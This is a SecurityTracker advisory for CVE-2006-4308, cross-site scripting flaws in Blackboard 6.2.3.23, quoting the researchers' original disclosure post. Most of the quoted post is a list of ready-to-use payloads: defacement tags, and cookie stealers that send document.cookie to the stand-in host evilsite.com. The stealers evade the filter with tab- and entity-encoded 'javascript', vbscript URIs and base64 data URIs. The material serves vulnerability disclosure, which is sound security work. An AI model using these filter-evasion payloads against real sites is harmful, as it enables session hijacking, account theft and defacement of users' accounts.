SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Blackboard Vendors:   Blackboard
Blackboard Input Validation Hole in Filtering Javascript Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1016735
SecurityTracker URL:  http://securitytracker.com/id/1016735
CVE Reference:   CVE-2006-4308   (Links to External Site)
Updated:  Jun 5 2008
Original Entry Date:  Aug 23 2006
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 6.2.3.23
Description:   A vulnerability was reported in Blackboard. A remote user can conduct cross-site scripting attacks.

Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can submit specially crafted HTML that, when viewed by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Blackboard software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The software properly filters the string "javascript", but does not filter encoded versions or variations.

PrOtOn and digi7al64 discovered this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Blackboard software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   The vendor has issued a patch.
Vendor URL:  www.blackboard.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Red Hat Enterprise), UNIX (Solaris - SunOS), Windows (2000), Windows (2003)

Message History:   None.


 Source Message Contents

Subject:  BlackBoard Multiple Vulnerabilities (XSS)

-----------------------------------------------------------------------------------------

Found by: PrOtOn & digi7al64

Date: May 20th 2006

Critical Level: High

Type: Multiple Cross Site Scripting (XSS) vunerabilities


------------------------------------------------------------------------------------------


Software:
Blackboard Learning System (Release 6) Blackboard Learning and Community Portal Suite (Release6)-6.2.3.23


------------------------------------------------------------------------------------------


Explanation: You can inject HTML, VB code and or Javascript into specific tags to steal 
cookies, deface the site using frame busters or even redirect to external sites for phishing purposes. 
If you have limited access, then a simple post into the Discussion Board using the right 
tags with the right code (provided below) will execute the vulnerability(ies).


-------------------------------------------------------------------------------------------

About:
Blackboards parsing system only checks for the string "javascript", Thus vbscript code can be injected at will into tags as well as
 any versions of javascript that uses uncommon syntax (ie tabs encoding etc)

-------------------------------------------------------------------------------------------
Vulnerabilities:

Defacement (FrameBuster)
-------------------------
<meta http-equiv="refresh"
content="15;url= http://evilsite.com">


Defacement (FrameBuster)
-------------------------
<iframe src=" http://evilsite.com" width=100
height=100></iframe>


Defacement (IE ONLY)
-------------------------
<img src=vbscript:document.write("defaced_by_insane_script_kiddies")>


Defacement (IE ONLY)
-------------------------
<link rel="stylesheet"
href=vbscript:document.write("defaced_by_insane_script_kiddies")>

<img src=vb script:document.write("defaced_by_insane_script_kiddies")>


Cookie Stealer (IE ONLY)
-------------------------

<img
src="vbscript:wintest=window.open(%22http://evilsite.com + document.cookie)"style=visibility:hidden/>
<img src="vbscript:window.focus ()"style=visibility:hidden/>
<img src="vbscript: window.close()"style=visibility:hidden/>


Cookie Stealer (IE ONLY)
-------------------------
<link rel="stylesheet"
href="vbscript:wintest=window.open(%22http://evilsite.com+document.cookie)">


Cookie Stealer (Encoded Tab - IE ONLY)
-------------------------
<img
src="jav&#x09;ascript: document.images[1].src=%22http://evilsite.com+document.cookie;"<img src="jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>


Cookie Stealer (html encoded - IE ONLY)
-------------------------
<img
src='&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;document.images[1].s
rc=" http://evilsite.com"+document.cookie;'<img
src="jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>


Cookie Stealer (tabs - IE ONLY)
-------------------------
<img src="jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>


Cookie Stealer (body tag with tabs - IE ONLY)
-------------------------
<body background="jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;">


Cookie Stealer (div tag with tabs - IE ONLY)
-------------------------
<div style="background-image: url(jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;)">


Cookie Stealer (firefox)
-------------------------
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4=">


Cookie Stealer (firefox - click to work)
-------------------------
<a
href="data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4=">hmmm</a>  


---------------------------------------------------------------------------------------------


Disclaimer:
Myself or any other person involved with this discovery will not be responsible for what you 
do with this information.
Blackboard developers have been contacted by me and a patch has been released according to them.


-----------------------------------------------------------------------------------------------


Shout Outs:
r0xes, criticalsecurity(dot)net, Infowar(dot)com


------------------------------------------------------------------------------------------------


Contact:
Pr070n(at)gmail(dot)com
Digi7al64(at)gmail(dot)com


-------------------------------------------------------------------------------------------------

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC